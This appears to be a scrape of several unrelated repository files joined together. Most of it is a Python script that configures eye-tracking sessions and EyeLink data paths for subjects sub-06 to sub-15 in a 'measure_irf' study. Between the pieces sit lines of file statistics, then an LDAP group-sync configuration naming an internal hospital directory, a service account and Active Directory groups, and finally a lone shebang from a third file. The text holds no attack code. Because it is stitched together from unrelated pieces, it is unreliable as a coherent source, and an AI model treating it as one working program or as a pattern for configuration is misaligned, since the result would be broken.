'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-06_s1_r1_b1_2015-11-13_14-02-26.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-06_s2_r1_b1_2015-11-21_10-16-21.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-06_s3_r1_b1_2015-11-26_19-20-42.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-06_s4_r1_b1_2015-12-01_18-55-04.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-07':
# subject information
initials = 'sub-07'
firstName = 'sub-07'
standardFSID = 'sub-07_190414'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 4)
sj_session1 = 'sub-07_041115'
if s == 2:
sessionDate = datetime.date(2015, 11, 12)
sj_session2 = 'sub-07_121115'
if s == 3:
sessionDate = datetime.date(2015, 11, 17)
sj_session3 = 'sub-07_171115'
if s == 4:
sessionDate = datetime.date(2015, 11, 26)
sj_session4 = 'sub-07_261115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-07_s1_r1_b1_2015-11-04_18-31-23.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-07_s2_r1_b1_2015-11-12_14-22-46.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-07_s3_r1_b1_2015-11-17_14-20-37.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-07_s4_r1_b1_2015-11-26_09-25-25.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-08':
# subject information
initials = 'sub-08'
firstName = 'sub-08'
standardFSID = 'sub-08_030215'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 12, 17)
sj_session1 = 'sub-08_171215'
if s == 2:
sessionDate = datetime.date(2016, 01, 11)
sj_session2 = 'sub-08_110116'
if s == 3:
sessionDate = datetime.date(2016, 01, 19)
sj_session3 = 'sub-08_190116'
if s == 4:
sessionDate = datetime.date(2016, 01, 29)
sj_session4 = 'sub-08_290116'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-08_s1_r1_b1_2015-12-17_09-23-37.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-08_s2_r1_b1_2016-01-11_16-15-13.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-08_s3_r1_b1_2016-01-19_16-13-03.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-08_s4_r1_b1_2016-01-29_11-30-10.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-09':
# subject information
initials = 'sub-09'
firstName = 'sub-09'
standardFSID = 'sub-09_250711'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 18)
sj_session1 = 'sub-09_181115'
if s == 2:
sessionDate = datetime.date(2015, 11, 26)
sj_session2 = 'sub-09_261115'
if s == 3:
sessionDate = datetime.date(2015, 12, 10)
sj_session3 = 'sub-09_101215'
if s == 4:
sessionDate = datetime.date(2016, 01, 28)
sj_session4 = 'sub-09_280116'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-09_s1_r1_b1_2015-11-18_16-02-37.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-09_s2_r1_b1_2015-11-26_16-29-34.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-09_s3_r2_b1_2015-12-10_20-18-28.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-09_s4_r1_b1_2016-01-28_14-59-48.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-10':
# subject information
initials = 'sub-10'
firstName = 'sub-10'
standardFSID = 'sub-10_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 11)
sj_session1 = 'sub-10_111115'
if s == 2:
sessionDate = datetime.date(2015, 11, 18)
sj_session2 = 'sub-10_181115'
if s == 3:
sessionDate = datetime.date(2015, 12, 02)
sj_session3 = 'sub-10_021215'
if s == 4:
sessionDate = datetime.date(2015, 12, 07)
sj_session4 = 'sub-10_071215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-10_s1_r1_b1_2015-11-11_12-02-48.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-10_s2_r1_b1_2015-11-18_11-58-37.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-10_s3_r1_b1_2015-12-02_16-25-52.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-10_s4_r1_b1_2015-12-07_13-25-20.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-11':
# subject information
initials = 'sub-11'
firstName = 'sub-11'
standardFSID = 'sub-11_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 12, 06)
sj_session1 = 'sub-11_061215'
if s == 2:
sessionDate = datetime.date(2016, 01, 13)
sj_session2 = 'sub-11_130116'
if s == 3:
sessionDate = datetime.date(2016, 01, 20)
sj_session3 = 'sub-11_200116'
if s == 4:
sessionDate = datetime.date(2016, 01, 27)
sj_session4 = 'sub-11_270116'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-11_s1_r1_b1_2015-12-06_10-41-43.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-11_s2_r1_b1_2016-01-13_12-29-04.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-11_s3_r1_b1_2016-01-20_12-03-29.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-11_s4_r1_b1_2016-01-27_11-48-32.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-12':
# subject information
initials = 'sub-12'
firstName = 'sub-12'
standardFSID = 'sub-12_091009tk'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 11)
sj_session1 = 'sub-12_111115'
if s == 2:
sessionDate = datetime.date(2015, 11, 25)
sj_session2 = 'sub-12_251115'
if s == 3:
sessionDate = datetime.date(2015, 12, 02)
sj_session3 = 'sub-12_021215'
if s == 4:
sessionDate = datetime.date(2015, 12, 15)
sj_session4 = 'sub-12_151215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-12_s1_r0_b1_2015-11-11_15-30-12.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-12_s2_r1_b1_2015-11-25_17-15-23.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-12_s3_r1_b1_2015-12-02_11-48-04.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-12_s4_r1_b1_2015-12-15_16-19-56.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-13':
# subject information
initials = 'sub-13'
firstName = 'sub-13'
standardFSID = 'sub-13_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 12, 04)
sj_session1 = 'sub-13_041215'
if s == 2:
sessionDate = datetime.date(2015, 12, 11)
sj_session2 = 'sub-13_111215'
if s == 3:
sessionDate = datetime.date(2016, 01, 8)
sj_session3 = 'sub-13_080116'
if s == 4:
sessionDate = datetime.date(2016, 01, 18)
sj_session4 = 'sub-13_180116'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-13_s1_r1_b1_2015-12-04_15-19-42.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-13_s2_r1_b1_2015-12-11_15-48-27.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-13_s3_r1_b1_2016-01-08_16-17-41.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-13_s4_r1_b1_2016-01-18_15-05-41.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-14':
# subject information
initials = 'sub-14'
firstName = 'sub-14'
standardFSID = 'sub-14_081014'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 10, 01)
sj_session1 = 'sub-14_011015'
if s == 2:
sessionDate = datetime.date(2015, 11, 04)
sj_session2 = 'sub-14_041115'
if s == 3:
sessionDate = datetime.date(2015, 11, 12)
sj_session3 = 'sub-14_121115'
if s == 4:
sessionDate = datetime.date(2015, 11, 20)
sj_session4 = 'sub-14_201115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
# No session 1
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-14_s2_r1_b1_2015-11-04_16-28-33.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-14_s3_r1_b1_2015-11-12_16-14-57.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-14_s4_r1_b1_2015-11-20_13-49-42.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-15':
# subject information
initials = 'sub-15'
firstName = 'sub-15'
standardFSID = 'sub-15_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 9, 26)
sj_session1 = 'sub-15_260915'
if s == 2:
sessionDate = datetime.date(2015, 10, 31)
sj_session2 = 'sub-15_311015'
if s == 3:
sessionDate = datetime.date(2015, 11, 07)
sj_session3 = 'sub-15_071115'
if s == 4:
sessionDate = datetime.date(2015, 11, 14)
sj_session4 = 'sub-15_141115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
# No session 1
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-15_s2_r1_b1_2015-10-31_10-28-56.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-15_s3_r1_b1_2015-11-07_10-30-52.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-15_s4_r1_b1_2015-11-14_10-17-03.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
| 51.527828
| 242
| 0.425578
| 4,700
| 57,402
| 5.003404
| 0.06766
| 0.015054
| 0.037847
| 0.052985
| 0.815232
| 0.788187
| 0.775344
| 0.769689
| 0.7318
| 0.716618
| 0
| 0.083657
| 0.402756
| 57,402
| 1,113
| 243
| 51.574124
| 0.602281
| 0.055381
| 0
| 0.537014
| 0
| 0
| 0.161773
| 0.048172
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015056
| null | null | 0.001255
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38f46a32e32b616e475c46db3065b7db219b8328
| 4,454
|
py
|
Python
|
etc/sranacomln03.py
|
samuelpulfer/ldaptools
|
74df73365a83b3e520ed9f14c985a094b8f63261
|
[
"MIT"
] | 1
|
2015-11-30T18:41:33.000Z
|
2015-11-30T18:41:33.000Z
|
etc/sranacomln03.py
|
samuelpulfer/ldaptools
|
74df73365a83b3e520ed9f14c985a094b8f63261
|
[
"MIT"
] | null | null | null |
etc/sranacomln03.py
|
samuelpulfer/ldaptools
|
74df73365a83b3e520ed9f14c985a094b8f63261
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# log files
modification_logfile="var/modification.log"
userdn = "CN=Dir Sync,OU=Admin,OU=Users,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"
userpw = None # stored in etc/`hostname`.pass
# Domain infos
baseDN = "dc=ms,dc=uhbs,dc=ch"
ldap_url = "ldap://ms.uhbs.ch:389"
# groups to sync
sync = [
# Ärzte
{
"from": "(&(cn=MQ_ANA_LA)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-LA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_OA)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-OA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_AA)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-AA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_OIB_Aerzte)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-OIB,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
# Pflege
{
"from": "(&(cn=MQ_ANA_Pflege)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Pflege-ANA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_OIB_Pflege)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Pflege-OIB,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_OPS)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Pflege-OPS,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
# Admin
{
"from": "(&(cn=MQ_ANA_IT)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Admin-IT,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_SEK)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Admin-Sek,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
]
"""
{
"from": "CN=MQ_ANA_LA,OU=Exchange_Adressbuecher,OU=PITServer,DC=ms,DC=uhbs,DC=ch",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-LA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"
},
{
"from": "CN=MQ_ANA_OA,OU=Exchange_Adressbuecher,OU=PITServer,DC=ms,DC=uhbs,DC=ch",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-OA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"
},
{
"from": "CN=MQ_ANA_AA,OU=Exchange_Adressbuecher,OU=PITServer,DC=ms,DC=uhbs,DC=ch",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-AA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"
},
"""
# LOWERCASE a list of ad usernames to ignore in sync
sync_vd_ignore_user = ["keilc"]
# a list of groups to sync
sync_vd = [
{"filter": "(& (cn=MQ_ANA_AA) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Aerzte-AA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_OA) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Aerzte-OA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_LA) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Aerzte-LA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_OIB_Aerzte) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Aerzte-OIB,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_OIB_Pflege) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Pflege-OIB,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_OPS) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Pflege-OPS,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_Pflege) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Pflege-ANA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_IT) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Admin-IT,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_SEK) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Admin-SEK,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
]
| 42.419048
| 171
| 0.684104
| 779
| 4,454
| 3.759949
| 0.098845
| 0.057357
| 0.053261
| 0.088768
| 0.89621
| 0.892796
| 0.888016
| 0.888016
| 0.888016
| 0.8648
| 0
| 0.000981
| 0.084419
| 4,454
| 104
| 172
| 42.826923
| 0.717263
| 0.080377
| 0
| 0.140625
| 0
| 0.296875
| 0.80334
| 0.63173
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ac0a22794610844420e87546a7e6a1f701d475ad
| 17,667
|
py
|
Python
|
tests/phased_execution_test.py
|
NunoEdgarGFlowHub/poptorch
|
2e69b81c7c94b522d9f57cc53d31be562f5e3749
|
[
"MIT"
] | null | null | null |
tests/phased_execution_test.py
|
NunoEdgarGFlowHub/poptorch
|
2e69b81c7c94b522d9f57cc53d31be562f5e3749
|
[
"MIT"
] | null | null | null |
tests/phased_execution_test.py
|
NunoEdgarGFlowHub/poptorch
|
2e69b81c7c94b522d9f57cc53d31be562f5e3749
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
